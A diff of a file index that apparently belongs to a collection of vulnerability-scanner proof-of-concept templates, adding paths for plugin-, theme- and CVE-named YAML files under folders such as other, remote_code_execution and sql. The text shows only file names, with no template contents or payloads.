./poc/other/cox-business-panel.yaml @@ -88300,6 +88452,7 @@ ./poc/other/cpt-shortcode.yaml ./poc/other/cpt-speakers-10bb947de003ffc54edfe54f29153ef3.yaml ./poc/other/cpt-speakers.yaml +./poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml ./poc/other/cql-native-transport.yaml ./poc/other/cracked-io.yaml ./poc/other/cracked.yaml @@ -88936,6 +89089,7 @@ ./poc/other/daisho-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/daisho-theme.yaml ./poc/other/daisho.yaml +./poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml ./poc/other/dancepress-trwa-b6aa9eb9d2e2d294e649c12aa7c09049.yaml ./poc/other/dancepress-trwa-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/dancepress-trwa-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -89183,6 +89337,7 @@ ./poc/other/depicter-417cbbd434ba5309ae238b4e0375b922.yaml ./poc/other/depicter-458944df26b6f77a25f4f6cb4ce03916.yaml ./poc/other/depicter-717caf8997fe4bffcff5305bfe489c2e.yaml +./poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml ./poc/other/depicter-cd536ae4f4d99d9b5aa3852213f0cd63.yaml ./poc/other/depicter-e261e9b3b325e35b0beae4de9a09a534.yaml ./poc/other/depicter.yaml @@ -89249,6 +89404,7 @@ ./poc/other/devices-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/devices.yaml ./poc/other/devika.yaml +./poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml ./poc/other/devrant.yaml ./poc/other/devto.yaml ./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml @@ -89613,6 +89769,7 @@ ./poc/other/donate-button.yaml ./poc/other/donate-extra-1e7bbe461a2be25a1602ea33b01f153b.yaml ./poc/other/donate-extra.yaml +./poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml ./poc/other/donate-with-qrcode-323bdd3633cb652e67eb0962ced13eb5.yaml ./poc/other/donate-with-qrcode-a639148d08d3721b86a0b181900c3cab.yaml ./poc/other/donate-with-qrcode-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -91606,6 +91763,7 @@ ./poc/other/essential-blocks-pro-e4ff1e42f6a30273380962b6b0ff9c1f.yaml ./poc/other/essential-blocks-pro.yaml ./poc/other/essential-blocks.yaml +./poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml ./poc/other/essential-content-types-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml ./poc/other/essential-content-types.yaml ./poc/other/essential-grid-82b5f48c2092879fd968777ee5abef7a.yaml @@ -91794,6 +91952,7 @@ ./poc/other/event-tickets-with-ticket-scanner-6dfff838d33b25cca8f5b75937f78a8f.yaml ./poc/other/event-tickets-with-ticket-scanner-70a154fff277e013948f577e63b65ff7.yaml ./poc/other/event-tickets-with-ticket-scanner-90eaeb74e7b4fe6ad55cbb7a10f06414.yaml +./poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml ./poc/other/event-tickets-with-ticket-scanner-f7f69a981a1771eefa234b9c717410ee.yaml ./poc/other/event-tickets-with-ticket-scanner-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/event-tickets-with-ticket-scanner-plugin.yaml @@ -92426,6 +92585,7 @@ ./poc/other/fastadmin.yaml ./poc/other/fastbee-arbitrary-file-read.yaml ./poc/other/fastbee.yaml +./poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml ./poc/other/fastcgi-echo.yaml ./poc/other/fastdup-4d937436569e469e00e1b26c70c6dd2f.yaml ./poc/other/fastdup-d463033e6c4a961471bff9c9179f1c0e.yaml @@ -92486,6 +92646,7 @@ ./poc/other/fcchat.yaml ./poc/other/fckeditor.yaml ./poc/other/fcv.yaml +./poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml ./poc/other/fd-elementor-imagebox.yaml ./poc/other/fe-oa.yaml ./poc/other/fe-showimageservlet-fileread-1.yaml @@ -92987,6 +93148,7 @@ ./poc/other/flipping-cards-48cb04972328068b7e2bc0222a988f79.yaml ./poc/other/flipping-cards.yaml ./poc/other/flix-ax8-download-read-file.yaml +./poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml ./poc/other/flo-launch-c0b76e33bba38054d324c4d8061dac74.yaml ./poc/other/flo-launch.yaml ./poc/other/float-menu-2877ccabc6efe9b37f49861c99be049d.yaml @@ -93126,6 +93288,7 @@ ./poc/other/focusblog.yaml ./poc/other/fodors-forum.yaml ./poc/other/fogproject.yaml +./poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml ./poc/other/folders-3ae5f40a47aa8ad98532331e7e55a70f.yaml ./poc/other/folders-4e67014384e0e8ec41ff946cc7f75478.yaml ./poc/other/folders-877efc41c9f6a415b6c29230ae5c516f.yaml @@ -93639,6 +93802,7 @@ ./poc/other/friendly-functions-for-welcart-8ea6e8ad49b596a40632d522f929afa1.yaml ./poc/other/friendly-functions-for-welcart.yaml ./poc/other/friends-413a2ada9a6ce3cb0188478529434f59.yaml +./poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml ./poc/other/friends.yaml ./poc/other/frigate.yaml ./poc/other/front-editor-1af8103919ae59630fbf391eb8af61df.yaml @@ -93972,8 +94136,10 @@ ./poc/other/gallery-video-plugin.yaml ./poc/other/gallery-video.yaml ./poc/other/gallery-videos-226f65c1e6cdad4d530c652d8ed73929.yaml +./poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml ./poc/other/gallery-videos-613b23cd346bbb0743881b81807572a0.yaml ./poc/other/gallery-videos-b0b3f41392f5d7ed9e53a46ed243de56.yaml +./poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml ./poc/other/gallery-videos.yaml ./poc/other/gallery-with-thumbnail-slider.yaml ./poc/other/game-debate.yaml @@ -94562,6 +94728,7 @@ ./poc/other/golang-metrics-7765.yaml ./poc/other/golang-metrics.yaml ./poc/other/golangci-lint.yml +./poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml ./poc/other/gold-addons-for-elementor-90883ca6a8b966ecef7c771640dd74b1.yaml ./poc/other/gold-addons-for-elementor.yaml ./poc/other/gold-price-chart-widget-c9ca1cc4b34f01f4d77bad8d6fa80c9d.yaml @@ -97583,9 +97750,12 @@ ./poc/other/kiteworks-pcn-panel.yaml ./poc/other/kivicare-clinic-management-system-0be13433ec5928ef155f55891fa9e8bf.yaml ./poc/other/kivicare-clinic-management-system-35f9b6be5ee89b50336f9d13e2b5ab03.yaml +./poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml ./poc/other/kivicare-clinic-management-system-40aceed85c52f061ca831e5be973be51.yaml +./poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml ./poc/other/kivicare-clinic-management-system-a84919117416d1acaa88edc17f31b472.yaml ./poc/other/kivicare-clinic-management-system-e68c07fce725cfe9b475bc12ee2199ed.yaml +./poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml ./poc/other/kivicare-clinic-management-system.yaml ./poc/other/kiwi-logo-carousel-08b2f14f524c2d5e63b61c362755a54c.yaml ./poc/other/kiwi-logo-carousel.yaml @@ -98164,6 +98334,8 @@ ./poc/other/lenovo-thinkserver-panel.yaml ./poc/other/lenovo-thinkserver.yaml ./poc/other/lenovo-防火墙.yaml +./poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml +./poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml ./poc/other/lenxel-core.yaml ./poc/other/leostream-panel-8609.yaml ./poc/other/leostream-panel-8610.yaml @@ -98517,6 +98689,7 @@ ./poc/other/llmnr-disabled.yaml ./poc/other/lm-hash-storage-enabled.yaml ./poc/other/lnmp.yaml +./poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml ./poc/other/loading-page-703919aaf3ac5207e458fe86bf1026b0.yaml ./poc/other/loading-page.yaml ./poc/other/loan-comparison-6d6609133b2e31f690e9731d2bd80de9.yaml @@ -98882,6 +99055,7 @@ ./poc/other/mail-masta.yaml ./poc/other/mail-on-update-806bdc3fd64d48d16ed3401957ed4104.yaml ./poc/other/mail-on-update.yaml +./poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml ./poc/other/mail-queue.yaml ./poc/other/mail-subscribe-list-12bb8884aa3aaa7f2d5c840ebe44a35d.yaml ./poc/other/mail-subscribe-list-26b2f7fb87ecdd3c2680bb9f38e5209c.yaml @@ -99703,6 +99877,7 @@ ./poc/other/meeting-scheduler-by-vcita-4cdae8691afad706d770724c4a36e255.yaml ./poc/other/meeting-scheduler-by-vcita-6cf5c63439a5551d25ba160189955a61.yaml ./poc/other/meeting-scheduler-by-vcita-79ce83ee6cac9f72c630a7e89dc6ffd3.yaml +./poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml ./poc/other/meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b.yaml ./poc/other/meeting-scheduler-by-vcita-a3c92bcf9826043ce97f5549811055fd.yaml ./poc/other/meeting-scheduler-by-vcita-b6045533aa76a48e4827e89274e42f23.yaml @@ -100154,6 +100329,7 @@ ./poc/other/miniorange-saml-20-single-sign-on-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/miniorange-saml-20-single-sign-on-plugin.yaml ./poc/other/miniorange-saml-20-single-sign-on.yaml +./poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml ./poc/other/mintme.yaml ./poc/other/minus-50709d48b6148ecbab70774ec662851c.yaml ./poc/other/minus-7a56cf17d477d3137dedce46dcb62586.yaml @@ -101303,11 +101479,13 @@ ./poc/other/newsmag-f3f203d9ab101f9d04ccf12ec6b5d164.yaml ./poc/other/newsmag.yaml ./poc/other/newsmash-40bc3abb5400677523e2ad7a6261fa5e.yaml +./poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml ./poc/other/newsmash.yaml ./poc/other/newsmatic-7f04fe0b571a41ddada248b3475a29ce.yaml ./poc/other/newsmatic-c2883a60e880da757a0feabedd524744.yaml ./poc/other/newsmatic.yaml ./poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml +./poc/other/newsmunch.yaml ./poc/other/newspack-ads-7cdcff626ec5e14115be00e6ae55d55d.yaml ./poc/other/newspack-ads.yaml ./poc/other/newspack-blocks-1b052f452f1bf0c9eb1a71371f42c0e6.yaml @@ -101989,6 +102167,7 @@ ./poc/other/online-estore.yaml ./poc/other/online-grades.yaml ./poc/other/onliner-multiple-bugs.yaml +./poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml ./poc/other/onlyoffice-installer.yaml ./poc/other/onminutes-crm.yaml ./poc/other/oob-param-based-interaction-9251.yaml @@ -103106,6 +103285,7 @@ ./poc/other/photo-gallery.yaml ./poc/other/photo-video-gallery-master-f0f4d695b59538a11f062de52cb08b3a.yaml ./poc/other/photo-video-gallery-master.yaml +./poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml ./poc/other/photo_station.yaml ./poc/other/photoblocks-grid-gallery-070e7c21dac14e93cbf5c4592da9e0a2.yaml ./poc/other/photoblocks-grid-gallery-175b78dcaa33f1642305da0ef2e8d7be.yaml @@ -103282,6 +103462,7 @@ ./poc/other/pixgraphy.yaml ./poc/other/pixiv-custom-5d898145396c89d16d93fe047e5b3e70.yaml ./poc/other/pixiv-custom.yaml +./poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml ./poc/other/pixova-lite-66ba1859ab560343222a23f4bdd2510b.yaml ./poc/other/pixova-lite-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/pixova-lite.yaml @@ -103377,6 +103558,7 @@ ./poc/other/plg_novana.yaml ./poc/other/pliska-405fe484522342f309e572b6f863f171.yaml ./poc/other/pliska.yaml +./poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml ./poc/other/plugin-central-81d9389612a1afe16ac9117292098b3e.yaml ./poc/other/plugin-central-b751676df4d35907e4c217f2ebe354a1.yaml ./poc/other/plugin-central-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -103804,6 +103986,7 @@ ./poc/other/post-carousel-ea57fce45364f30b01a71e0b6cc7d73e.yaml ./poc/other/post-carousel-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/post-carousel-plugin.yaml +./poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml ./poc/other/post-carousel.yaml ./poc/other/post-category-image-with-grid-and-slider-375a5b2c1df41c6d0e13cd16d3e7f19b.yaml ./poc/other/post-category-image-with-grid-and-slider.yaml @@ -104096,6 +104279,7 @@ ./poc/other/powerpack-lite-for-elementor-4ae4b5ba374699fdefe1d0fca67d1b72.yaml ./poc/other/powerpack-lite-for-elementor-801a4fd099de84e12762e37f19f06b41.yaml ./poc/other/powerpack-lite-for-elementor-9729d1323c28fdfde4e709e181d20940.yaml +./poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml ./poc/other/powerpack-lite-for-elementor-f6e2cb44c541528e4bdd396f627b6a7f.yaml ./poc/other/powerpack-lite-for-elementor.yaml ./poc/other/powerpress-1e3d37c0409f287ef569ee57bf8b5111.yaml @@ -104686,6 +104870,7 @@ ./poc/other/publishpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/publishpress-plugin.yaml ./poc/other/publishpress.yaml +./poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml ./poc/other/pubsab-malware.yaml ./poc/other/pubsubhubbub-8b9f60491d53b8c8e4056727f71c36e9.yaml ./poc/other/pubsubhubbub.yaml @@ -105220,6 +105405,7 @@ ./poc/other/rancher-panel.yaml ./poc/other/rancher-workflow.yaml ./poc/other/rancher.yaml +./poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml ./poc/other/random-banner-5f9bd55dfb4886d9971e3280798324ec.yaml ./poc/other/random-banner-66e79d43b9bf633ecf7f76918cf8d85b.yaml ./poc/other/random-banner-aa7a1aee86bb07fd299ad157b2709702.yaml @@ -105305,6 +105491,7 @@ ./poc/other/rbsoft-software.yaml ./poc/other/rbxgallery-0afd09d3bebe9f136a82dc448971c35c.yaml ./poc/other/rbxgallery.yaml +./poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml ./poc/other/rd-wc-order-modifier-95c2fea175252b462658a5ecb1a18747.yaml ./poc/other/rd-wc-order-modifier-983b6e1fd4f4de142422f08e7915e1b6.yaml ./poc/other/rd-wc-order-modifier-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -108054,6 +108241,7 @@ ./poc/other/simple-popup-newsletter.yaml ./poc/other/simple-popup-plugin-2bd36fdc29b22dc0d0684dee04b24952.yaml ./poc/other/simple-popup-plugin-5287b8f51d53c1caefc3ecc634903892.yaml +./poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml ./poc/other/simple-popup-plugin.yaml ./poc/other/simple-popup.yaml ./poc/other/simple-portfolio-gallery-c823a8c32782388082e34fa9dc4f43bc.yaml @@ -108240,6 +108428,7 @@ ./poc/other/simplepress-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/simplepress-e3965c8d4e66020e113c368a7914c8c3.yaml ./poc/other/simplepress.yaml +./poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml ./poc/other/simpleshop-cz-70583275df8a8d66c89e3e54c1e38c92.yaml ./poc/other/simpleshop-cz-995fe677d959107577aa1354e02a9b05.yaml ./poc/other/simpleshop-cz.yaml @@ -108436,6 +108625,7 @@ ./poc/other/sky-elementor-addons-e1e3d7e83d6ee08aac98fd9f64280dd4.yaml ./poc/other/sky-elementor-addons.yaml ./poc/other/sky-phish.yaml +./poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml ./poc/other/skycaiji-admin-panel-10304.yaml ./poc/other/skycaiji-admin-panel-10305.yaml ./poc/other/skycaiji-admin-panel-10306.yaml @@ -108665,6 +108855,7 @@ ./poc/other/smart-maintenance-mode.yaml ./poc/other/smart-mockups-b1f443189eb688858fd0760beeec94dd.yaml ./poc/other/smart-mockups.yaml +./poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml ./poc/other/smart-recent-posts-widget-d88f3f455f89003fa5734c525e70e76b.yaml ./poc/other/smart-recent-posts-widget.yaml ./poc/other/smart-seo-tool-1e322b6ba0f76d96af5775520509b483.yaml @@ -108845,6 +109036,7 @@ ./poc/other/softether-vpn.yaml ./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml ./poc/other/softnext-spam.yaml +./poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml ./poc/other/software-integrity-failures.yaml ./poc/other/software-license-manager-02438a90e5cab2e347474ab67e16a2e0.yaml ./poc/other/software-license-manager-08f24ceaa9760ed4a8e1dcab46bbae35.yaml @@ -108883,6 +109075,7 @@ ./poc/other/solarwinds-orion.yaml ./poc/other/solarwinds.yaml ./poc/other/soledad-08fdc0fa4fb6c4def2e2333a78ea6b73.yaml +./poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml ./poc/other/soledad-37b9a8efffbd7fda52057c09793a9115.yaml ./poc/other/soledad-46b9c25417dc1916d1b92681c94a5b3d.yaml ./poc/other/soledad-55ed48a13b9d19cfc1668b1676a5c21b.yaml @@ -109062,6 +109255,7 @@ ./poc/other/spark.yaml ./poc/other/sparkle-demo-importer-7bee5b1af940c855c62dfdccf8baf946.yaml ./poc/other/sparkle-demo-importer.yaml +./poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml ./poc/other/sparklestore-236bed5b5a49a6173251e991d6ca44d1.yaml ./poc/other/sparklestore-d2a46afd6d61289094ec49e6cf79a7c7.yaml ./poc/other/sparklestore.yaml @@ -109209,6 +109403,7 @@ ./poc/other/spin360.yaml ./poc/other/spip-install.yaml ./poc/other/spip.yaml +./poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml ./poc/other/splash-rendering-service.yaml ./poc/other/splashscreen-e99cd6f52d6ff45048d4d7eaafac3dec.yaml ./poc/other/splashscreen.yaml @@ -109982,6 +110177,7 @@ ./poc/other/sv-provenexpert.yaml ./poc/other/sv-tracking-manager-cf663949cda235c9ea12aa65dd114d87.yaml ./poc/other/sv-tracking-manager.yaml +./poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml ./poc/other/svg-block-6ffe8bb8705f516ed225e4cda177f560.yaml ./poc/other/svg-block-dc4f23aceeda39e46a3f1145d98bd672.yaml ./poc/other/svg-block.yaml @@ -110040,6 +110236,7 @@ ./poc/other/swift-framework-30d3f5776ed35230993fad52196a3d03.yaml ./poc/other/swift-framework.yaml ./poc/other/swift-performance-lite-03ea7bc0944040c0164e11ef3d52374f.yaml +./poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml ./poc/other/swift-performance-lite-ff16d085629ee3b61efab5d02050c62e.yaml ./poc/other/swift-performance-lite.yaml ./poc/other/swifty-bar-55e944853212366688eada78aebb13f0.yaml @@ -111688,6 +111885,7 @@ ./poc/other/twenty20.yaml ./poc/other/twentyfifteen-e9f7cbc36c5c4d5fb72ef5ac394aedde.yaml ./poc/other/twentyfifteen.yaml +./poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml ./poc/other/twigify-4ae6138a64b6a684977cb2a70738b6dc.yaml ./poc/other/twigify.yaml ./poc/other/twitcasting.yaml @@ -111736,6 +111934,7 @@ ./poc/other/uac-elevate-without-prompt.yaml ./poc/other/uag2100.yaml ./poc/other/uag2100_firmware.yaml +./poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml ./poc/other/uber-grid-98670d29e16e4f4770b4bbde2adf0646.yaml ./poc/other/uber-grid.yaml ./poc/other/uber-phish.yaml @@ -111918,6 +112117,8 @@ ./poc/other/ultimate-classified-listings-7d58dd9b18a638181ffbe094af3eae4d.yaml ./poc/other/ultimate-classified-listings-a55b916c304c51a1b04f17b6dc5ad876.yaml ./poc/other/ultimate-classified-listings.yaml +./poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml +./poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml ./poc/other/ultimate-dashboard-2d6c980f1b71a4137c918fd86f88e6b9.yaml ./poc/other/ultimate-dashboard-5faff98325793a73dd67f7cf4ee8d8eb.yaml ./poc/other/ultimate-dashboard-7277279061009a48883dc0e06b350b6d.yaml @@ -113598,6 +113799,7 @@ ./poc/other/watu-1ead06580a956da08d97a649f0788258.yaml ./poc/other/watu-4d628125cd756c9f2c511f4167431a3b.yaml ./poc/other/watu-5c073ba6bf6c7c87161a498fbf10ad3e.yaml +./poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml ./poc/other/watu-9062ef8924f40d9755450f4c54d45f3f.yaml ./poc/other/watu-92a420959f8536c6c5dda3bafbacbab3.yaml ./poc/other/watu-9830d337b08b250a99a60ff90962857e.yaml @@ -114081,6 +114283,7 @@ ./poc/other/wip-incoming-lite-cf7facf8e3af34332be0173ed93179a2.yaml ./poc/other/wip-incoming-lite.yaml ./poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml +./poc/other/wip-woocarousel-lite.yaml ./poc/other/wireclub.yaml ./poc/other/wireguard-preshared.yaml ./poc/other/wireless-access-point-controller.yaml @@ -114466,6 +114669,7 @@ ./poc/other/woo-pdf-invoice-builder-5bd45b3163617189ce7308fb26a11801.yaml ./poc/other/woo-pdf-invoice-builder-71b40029fdfb6655eeea274a86ce417a.yaml ./poc/other/woo-pdf-invoice-builder-843948fd1f1b86a6e7d550c861ad1ed8.yaml +./poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml ./poc/other/woo-pdf-invoice-builder.yaml ./poc/other/woo-pdf-invoices-bulk-download-472842e06756dc17bab4168ce9177b37.yaml ./poc/other/woo-pdf-invoices-bulk-download-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -115180,6 +115384,7 @@ ./poc/other/xiuno.yaml ./poc/other/xjhtqy-crm.yaml ./poc/other/xjhyt-system.yaml +./poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml ./poc/other/xl-tab-c1541f5d341255cfb7d8669f748f395e.yaml ./poc/other/xl-tab.yaml ./poc/other/xllentech-english-islamic-calendar-1d5b04bee2df8076985b3802622f831c.yaml @@ -115280,6 +115485,7 @@ ./poc/other/yada-wiki-0e04c450c7a6033c90d580fe0890dc93.yaml ./poc/other/yada-wiki.yaml ./poc/other/yahoo-japan-auction.yaml +./poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml ./poc/other/yahoo-phish.yaml ./poc/other/yamaps-f9146b05cc50468ff3e1ed6ab1cd8fe0.yaml ./poc/other/yamaps.yaml @@ -115816,6 +116022,7 @@ ./poc/other/zlick-paywall.yaml ./poc/other/zm-gallery.yaml ./poc/other/zmarsacom.yaml +./poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml ./poc/other/zoho-campaigns-67bb4e69a169a782467f485fb6cfcf93.yaml ./poc/other/zoho-campaigns-8ef70bd21a986de5c011a40971fa9a78.yaml ./poc/other/zoho-campaigns-cc101221171fc689aa4c8dd1485aaa4d.yaml @@ -116943,6 +117150,7 @@ ./poc/remote_code_execution/account-manager-woocommerce-198aaf82d5ab4648c4ab1ac1d78a7c90.yaml ./poc/remote_code_execution/account-manager-woocommerce.yaml ./poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml +./poc/remote_code_execution/accounting-for-woocommerce.yaml ./poc/remote_code_execution/acf-for-woocommerce-product-5f5d0f52c1d912f42f77906eaf762cdd.yaml ./poc/remote_code_execution/acf-for-woocommerce-product-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/acf-for-woocommerce-product.yaml @@ -118176,6 +118384,7 @@ ./poc/remote_code_execution/more-better-reviews-for-woocommerce.yaml ./poc/remote_code_execution/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml ./poc/remote_code_execution/mq-woocommerce-products-price-bulk-edit.yaml +./poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml ./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-1076c5f355a65534e72ef51489341d2f.yaml ./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-3dcd3ff11562779966f412aa5b51000d.yaml ./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-522568ff6baf34c6f7bed5d2ee776244.yaml @@ -118236,10 +118445,12 @@ ./poc/remote_code_execution/next-order-coupon-woocommerce-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/remote_code_execution/next-order-coupon-woocommerce-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/remote_code_execution/next-order-coupon-woocommerce.yaml +./poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml ./poc/remote_code_execution/nginx-webui-rce.yaml ./poc/remote_code_execution/nginxwebui-runcmd-rce.yaml ./poc/remote_code_execution/ni-purchase-orderpo-for-woocommerce-d3a637fd2d20648c0d7b44bd37557752.yaml ./poc/remote_code_execution/ni-purchase-orderpo-for-woocommerce.yaml +./poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml ./poc/remote_code_execution/ni-woocommerce-custom-order-status-c82f3bfb0227cd93471796cd6ad7019e.yaml ./poc/remote_code_execution/ni-woocommerce-custom-order-status.yaml ./poc/remote_code_execution/ni-woocommerce-sales-report-8a31f44eb6f99b33cb133332f49866d6.yaml @@ -119985,6 +120196,7 @@ ./poc/remote_code_execution/woocommerce-support-ticket-system-c55b90eb13850c1f21f1569dfb76cac8.yaml ./poc/remote_code_execution/woocommerce-support-ticket-system-f22cd57903a5b9c81a6842d03c2e5a79.yaml ./poc/remote_code_execution/woocommerce-support-ticket-system.yaml +./poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml ./poc/remote_code_execution/woocommerce-upcoming-product-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/woocommerce-upcoming-product-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/remote_code_execution/woocommerce-upcoming-product.yaml @@ -121142,6 +121354,7 @@ ./poc/search/smartsearchwp.yaml ./poc/search/sort-searchresult-by-title-86feb80f760342151e6b43a07a4c470f.yaml ./poc/search/sort-searchresult-by-title.yaml +./poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml ./poc/search/sphinxsearch-config.yaml ./poc/search/sw_ajax_woocommerce_search-5ce78f9939b9150d27f312b9585f1d7a.yaml ./poc/search/sw_ajax_woocommerce_search-c4bf0c010e385ed4f61abcf59a51504f.yaml @@ -124046,6 +124259,7 @@ ./poc/sql/CVE-2024-1080-15318692234db11db0354155dd2f2282.yaml ./poc/sql/CVE-2024-10851-dbe7b5e4e9cfdb363f696ddca5d2335c.yaml ./poc/sql/CVE-2024-10854-dc294b17b7eb8d67dbabdea0e0fccc45.yaml +./poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml ./poc/sql/CVE-2024-10878-2a6958b657c7efaf0d338a4aea9db038.yaml ./poc/sql/CVE-2024-10890-007744aef7f83fa0ee95dbf3047ac5b2.yaml ./poc/sql/CVE-2024-10899-e69dd2249584b3a0690feee574c3db8b.yaml @@ -124055,8 +124269,10 @@ ./poc/sql/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml ./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml ./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml +./poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml ./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml ./poc/sql/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml +./poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml ./poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml ./poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml ./poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml @@ -124072,10 +124288,14 @@ ./poc/sql/CVE-2024-11412-b7f9a59e3648736328457db943a1aa23.yaml ./poc/sql/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml ./poc/sql/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml +./poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml +./poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml ./poc/sql/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml ./poc/sql/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml 